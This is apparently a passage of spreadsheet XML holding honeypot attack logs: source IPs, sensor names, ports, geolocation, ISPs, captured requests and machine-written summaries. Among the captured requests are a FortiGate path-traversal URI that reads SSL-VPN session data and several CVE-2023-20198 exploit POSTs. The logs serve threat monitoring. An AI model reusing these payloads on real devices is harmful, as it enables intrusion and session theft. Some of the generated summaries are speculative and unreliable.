    <t>**Password Cracking Attack** &amp;&amp; SMB Scanning &amp;&amp; FTP Attack &amp;&amp; FTP Auth &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>264ea4115d9bf1091f53e4f5f5d21c49</t>
  </si>
  <si>
    <t>89.248.162.181</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H19</t>
  </si>
  <si>
    <t>445&amp;&amp;1080&amp;&amp;21&amp;&amp;443&amp;&amp;8443&amp;&amp;80&amp;&amp;23&amp;&amp;58426&amp;&amp;58410&amp;&amp;NA&amp;&amp;56892</t>
  </si>
  <si>
    <t>202425</t>
  </si>
  <si>
    <t>IP Volume inc</t>
  </si>
  <si>
    <t>Quasi Networks LTD</t>
  </si>
  <si>
    <t>connection&amp;&amp;POST&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Connection': 'close', 'Host': '38.54.117.64:443', 'User-Agent': 'Python-urllib/3.8', 'method': 'GET', 'uri': '/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '735', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '38.54.117.64', 'User-Agent': 'CVE-2023-20198', 'method': 'POST', 'uri': '/%2577eb%2575i_%2577sma_Http'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '735', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '154.26.156.60', 'User-Agent': 'CVE-2023-20198', 'method': 'POST', 'uri': '/%2577eb%2575i_%2577sma_Http'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '735', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '109.123.229.33', 'User-Agent': 'CVE-2023-20198', 'method': 'POST', 'uri': '/%2577eb%2575i_%2577sma_Http'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '154.26.156.60:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Connection': 'TE, close', 'Host': '154.26.156.60:80', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '91.194.11.82', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.97.67', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '38.54.42.176:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '103.211.202.140:8443', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '103.113.68.70', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '156.244.8.69', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '156.244.8.69', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '156.244.8.69', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/public/index.html'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '156.244.8.69:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.79.122', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.79.122', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.79.122', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/public/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.115.66', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.115.66', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.115.66', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/public/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/public/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '91.194.11.82', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/public/index.html'}}</t>
  </si>
  <si>
    <t>::ffff:59f8:a2b5</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze. &amp;&amp; No activity detected as TELNET service has never been active on this system. The lack of any recorded attempts to access the service suggests it may be inactive or not properly configured. No malicious activity was reported for this service. &amp;&amp; No log data provided, therefore no analysis can be conducted. &amp;&amp; There is no log data provided, so there's nothing to analyze or describe. &amp;&amp; No log data provided, therefore unable to analyze. &amp;&amp; An unknown host is making a GET request to a suspicious URL, likely attempting to access login credentials. The User-Agent suggests the request may be automated or malicious in nature. The Accept-Encoding header indicates potential compression or decompression capabilities. &amp;&amp; Possible malicious activity: Unauthorized access attempt to a web application, likely a brute-force login attack on a server at IP address 94.131.113.33, with the user agent identifying as python-requests/2.32.3. This is indicated by an unusual URI path '+CSCOE+/logon.html' and a 'method' of GET which could be probing for vulnerabilities. &amp;&amp; A user is accessing a sensitive administrative page on the target system, attempting to download a malicious executable likely for remote command execution or malware deployment. This activity suggests an attempted exploitation of vulnerabilities in the system's administration interface. The user agent indicates automated tools were used. &amp;&amp; A GET request to an administrator interface for a Windows installer file, suggesting an attempt to exploit or install malicious software remotely. The user agent is a legitimate Python library, indicating potential misuse of the library's functionality. This activity may be related to malware distribution or exploitation. &amp;&amp; This log indicates a GET request to an administrative page, potentially attempting unauthorized access or reconnaissance. The User-Agent suggests the activity is likely automated. The request targets an administrative path, which may be part of a larger malicious campaign. &amp;&amp; The user is trying to access the admin login page of a website, possibly for malicious purposes such as exploiting vulnerabilities or unauthorized access. The request is being made from an unknown IP address and using the Python Requests library, which may be used by attackers. This activity could indicate an attempt at unauthorized system access.</t>
  </si>
  <si>
    <t>Brute Force Attack &amp;&amp; Scanning Attempt &amp;&amp; Web Scanner &amp;&amp; SQLi Scan &amp;&amp; Malware Download &amp;&amp; Port Scanning
            &amp;&amp; Port Scan &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>3af2d8ce41176afc704cb41314915b5b</t>
  </si>
  <si>
    <t>221.144.151.207</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>23&amp;&amp;43975&amp;&amp;44714&amp;&amp;39783&amp;&amp;NA</t>
  </si>
  <si>
    <t>Gangwon-do</t>
  </si>
  <si>
    <t>Wonju-si</t>
  </si>
  <si>
    <t>Wŏnju (Myeongnyun-dong)</t>
  </si>
  <si>
    <t>1833105</t>
  </si>
  <si>
    <t>37.335</t>
  </si>
  <si>
    <t>127.944</t>
  </si>
  <si>
    <t>myungryounONU</t>
  </si>
  <si>
    <t>::ffff:dd90:97cf</t>
  </si>
  <si>
    <t>db9328895556f09af36102403fe48f51</t>
  </si>
  <si>
    <t>103.96.13.171</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>Kutch</t>
  </si>
  <si>
    <t>Bhuj (Madhapar)</t>
  </si>
  <si>
    <t>1275812</t>
  </si>
  <si>
    <t>370001</t>
  </si>
  <si>
    <t>23.2411</t>
  </si>
  <si>
    <t>69.6673</t>
  </si>
  <si>
    <t>136654</t>
  </si>
  <si>
    <t>Krishna Broadband</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:6760:dab</t>
  </si>
  <si>
    <t>38e79e017795d28b6b4dc70d0f2bc9b1</t>
  </si>
  <si>
    <t>154.212.141.188</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_SIP_H26&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SIP_H38&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_POP3_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;1433&amp;&amp;110&amp;&amp;23&amp;&amp;443&amp;&amp;21&amp;&amp;9100&amp;&amp;NA&amp;&amp;445&amp;&amp;5432&amp;&amp;3306&amp;&amp;25&amp;&amp;3389&amp;&amp;29042&amp;&amp;143</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;GET&amp;&amp;NA&amp;&amp;request&amp;&amp;command&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 5.181.21.224:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.188,32900)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '95.164.21.98:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.188;rport=5298'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.188;rport=2218'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.4.48.242:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 95.164.21.98:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '194.233.76.135:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 5.180.55.39:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.255.123.181:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '185.255.123.181:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '66.94.127.183:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.188;rport=13670'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.188,56164)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (kxYKiIpP,)}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8dbc</t>
  </si>
  <si>
    <t>c2afb92005aa1741df6b6032a54cbe57</t>
  </si>
  <si>
    <t>203.189.150.125</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;34096&amp;&amp;47348&amp;&amp;57488&amp;&amp;NA</t>
  </si>
  <si>
    <t>KH</t>
  </si>
  <si>
    <t>Cambodia</t>
  </si>
  <si>
    <t>Phnom Penh</t>
  </si>
  <si>
    <t>1821306</t>
  </si>
  <si>
    <t>11.5625</t>
  </si>
  <si>
    <t>104.916</t>
  </si>
  <si>
    <t>23673</t>
  </si>
  <si>
    <t>COGETEL Co., Ltd</t>
  </si>
  <si>
    <t>COGETEL Co</t>
  </si>
  <si>
    <t>Cogetel Ltd</t>
  </si>
  <si>
    <t>::ffff:cbbd:967d</t>
  </si>
  <si>
    <t>This suggests an attempt to access Microsoft SQL Server, possibly via a brute force attack or exploitation of a vulnerability, without any specific success or failure indication. It may indicate probing for potential entry points or weaknesses. The lack of success might be due to various security measures in place.</t>
  </si>
  <si>
    <t>169de02bb3a8ee9fb72d3b85de795602</t>
  </si>
  <si>
    <t>61.3.76.199</t>
  </si>
  <si>
    <t>::ffff:3d03:4cc7</t>
  </si>
  <si>
    <t>33e7e3da27fa1b363a738a0aedb87e89</t>
  </si>
  <si>
    <t>117.211.131.61</t>
  </si>
  <si>
    <t>::ffff:75d3:833d</t>
  </si>
  <si>
    <t>71ec71d22e98a307848f43887d30228f</t>
  </si>
  <si>
    <t>117.204.132.229</t>
  </si>
  <si>
    <t>::ffff:75cc:84e5</t>
  </si>
  <si>
    <t>fb0db60d17308a34c42503734ea512aa</t>
  </si>
  <si>
    <t>118.70.116.178</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Đống Đa District</t>
  </si>
  <si>
    <t>Đống Đa</t>
  </si>
  <si>
    <t>8616121</t>
  </si>
  <si>
    <t>21.0201</t>
  </si>
  <si>
    <t>105.831</t>
  </si>
  <si>
    <t>18403</t>
  </si>
  <si>
    <t>FPT Telecom Company</t>
  </si>
  <si>
    <t>Vietnam Internet Network Information Center</t>
  </si>
  <si>
    <t>::ffff:7646:74b2</t>
  </si>
  <si>
    <t>No malicious activity detected for TELNET service, as it is listed as Not Available (NA). This indicates no incoming connections or attempts to connect via TELNET were recorded during the monitoring period. It does not necessarily imply that the service was inactive or unavailable. &amp;&amp; No log data provided, unable to analyze.</t>
  </si>
  <si>
    <t>347525d12f2cb4b4499458ab234113a4</t>
  </si>
  <si>
    <t>120.61.198.169</t>
  </si>
  <si>
    <t>::ffff:783d:c6a9</t>
  </si>
  <si>
    <t>645fcb97e54e781a3184f98fe44e9715</t>
  </si>
  <si>
    <t>141.98.11.175</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_DNS_H7&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MT-CPA_H43</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;48509&amp;&amp;38399&amp;&amp;39841&amp;&amp;80&amp;&amp;46765&amp;&amp;50370&amp;&amp;44561&amp;&amp;33639&amp;&amp;23&amp;&amp;34707&amp;&amp;46436&amp;&amp;50272&amp;&amp;58201&amp;&amp;55725&amp;&amp;53&amp;&amp;30005&amp;&amp;57835&amp;&amp;53948&amp;&amp;52735&amp;&amp;40994&amp;&amp;48060&amp;&amp;56835&amp;&amp;58166&amp;&amp;39161&amp;&amp;53231&amp;&amp;45203&amp;&amp;53961&amp;&amp;42055&amp;&amp;33327&amp;&amp;39851&amp;&amp;42781&amp;&amp;44014&amp;&amp;52160&amp;&amp;60441&amp;&amp;39019&amp;&amp;56897&amp;&amp;57493&amp;&amp;54553&amp;&amp;40348&amp;&amp;33868&amp;&amp;54104&amp;&amp;59830&amp;&amp;38870&amp;&amp;34225&amp;&amp;38643&amp;&amp;58317&amp;&amp;39351&amp;&amp;40930&amp;&amp;35803&amp;&amp;54219&amp;&amp;56997&amp;&amp;54494&amp;&amp;58475&amp;&amp;49016&amp;&amp;59038&amp;&amp;49670&amp;&amp;53246&amp;&amp;52181&amp;&amp;55969&amp;&amp;43493&amp;&amp;47719&amp;&amp;60048&amp;&amp;51672&amp;&amp;52613&amp;&amp;41922&amp;&amp;36248&amp;&amp;32815&amp;&amp;33627&amp;&amp;38231&amp;&amp;56726&amp;&amp;56826&amp;&amp;34846&